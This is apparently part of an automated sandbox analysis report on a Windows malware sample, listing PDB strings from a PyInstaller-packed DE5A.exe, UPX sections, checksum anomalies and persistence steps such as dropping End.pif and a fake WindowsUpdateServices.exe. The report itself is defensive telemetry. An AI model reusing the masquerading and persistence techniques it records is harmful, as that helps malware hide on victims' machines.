                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DE5A.exe, 00000016.00000002.2475941102.00007FFE1A481000.00000040.00000001.01000000.00000018.sdmp, DE5A.exe, 0000002E.00000002.2598135360.00007FFE1A481000.00000040.00000001.01000000.00000028.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DE5A.exe, 00000016.00000002.2474470989.00007FFE115A1000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB279000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DE5A.exe, 00000016.00000002.2474040580.00007FFE11581000.00000040.00000001.01000000.0000001C.sdmp, DE5A.exe, 0000002E.00000002.2596230418.00007FFE11581000.00000040.00000001.01000000.0000002C.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DE5A.exe, 00000016.00000002.2477389116.00007FFE1A49E000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DE5A.exe, 00000016.00000002.2474846626.00007FFE11BB1000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DE5A.exe, 00000015.00000003.2399448628.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460344804.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: DE5A.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DE5A.exe, 00000016.00000002.2475545585.00007FFE1A451000.00000040.00000001.01000000.0000001D.sdmp, DE5A.exe, 0000002E.00000002.2597768086.00007FFE1A451000.00000040.00000001.01000000.0000002D.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: DE5A.exe, 00000016.00000002.2475199806.00007FFE11BD1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: api-ms-win-core-console-l1-1-0.dll.21.dr Static PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 10_2_00995FC8
                        Source: libssl-3.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x3a250
                        Source: _lzma.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x258b9
                        Source: sqlite3.dll.21.dr Static PE information: real checksum: 0x0 should be: 0xacaad
                        Source: python312.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x1c80ff
                        Source: _ssl.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x1764c
                        Source: libffi-8.dll.39.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
                        Source: _hashlib.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0xfa67
                        Source: Og1SeeXcB2.exe Static PE information: real checksum: 0x0 should be: 0xcc7e2
                        Source: _queue.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0xef88
                        Source: _sqlite3.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x19009
                        Source: _socket.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0xd03a
                        Source: _decimal.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x25e84
                        Source: _bz2.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0xdc77
                        Source: unicodedata.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x521f3
                        Source: libcrypto-3.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x19efbf
                        Source: select.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x7bd2
                        Source: _ctypes.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x1d595
                        Source: _ctypes.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x1d595
                        Source: python312.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x1c80ff
                        Source: _sqlite3.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x19009
                        Source: WindowsUpdateServices.exe.61.dr Static PE information: real checksum: 0x0 should be: 0x7e63a
                        Source: libffi-8.dll.21.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
                        Source: _lzma.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x258b9
                        Source: sqlite3.dll.39.dr Static PE information: real checksum: 0x0 should be: 0xacaad
                        Source: _queue.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0xef88
                        Source: _socket.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0xd03a
                        Source: _decimal.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0x25e84
                        Source: libcrypto-3.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x19efbf
                        Source: _ssl.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x1764c
                        Source: select.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x7bd2
                        Source: DE5A.exe.18.dr Static PE information: real checksum: 0x87c310 should be: 0x87a527
                        Source: libssl-3.dll.39.dr Static PE information: real checksum: 0x0 should be: 0x3a250
                        Source: _hashlib.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0xfa67
                        Source: unicodedata.pyd.39.dr Static PE information: real checksum: 0x0 should be: 0x521f3
                        Source: _bz2.pyd.21.dr Static PE information: real checksum: 0x0 should be: 0xdc77
                        Source: DE5A.exe.18.dr Static PE information: section name: _RDATA
                        Source: libffi-8.dll.21.dr Static PE information: section name: UPX2
                        Source: VCRUNTIME140.dll.21.dr Static PE information: section name: fothk
                        Source: VCRUNTIME140.dll.21.dr Static PE information: section name: _RDATA
                        Source: libffi-8.dll.39.dr Static PE information: section name: UPX2
                        Source: VCRUNTIME140.dll.39.dr Static PE information: section name: fothk
                        Source: VCRUNTIME140.dll.39.dr Static PE information: section name: _RDATA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 10_2_009B0DE6 push ecx; ret 10_2_009B0DF9
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 13_2_009B0DE6 push ecx; ret 13_2_009B0DF9
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 13_2_009AD145 push esp; retf 0003h 13_2_009AD146
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif Code function: 15_2_004032AC push eax; ret 15_2_004032C2
                        Source: C:\Users\user\AppData\Roaming\wsruwii Code function: 20_2_00190315 push cs; retn 0018h 20_2_00190318
                        Source: C:\Users\user\AppData\Roaming\wsruwii Code function: 20_2_00160DE6 push ecx; ret 20_2_00160DF9
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Code function: 22_2_00007FFDFF264021 push rcx; ret 22_2_00007FFDFF264022
                        Source: initial sample Static PE information: section name: UPX0
                        Source: initial sample Static PE information: section name: UPX1

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Windows\System32\cmd.exe Process created: reg.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-math-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processenvironment-l1-1-0.dll
                        Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Temp\bound.exe File created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pyd
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-environment-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-string-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\ucrtbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-2-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-namedpipe-l1-1-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-2-0.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI43482\libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe File created: C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pyd
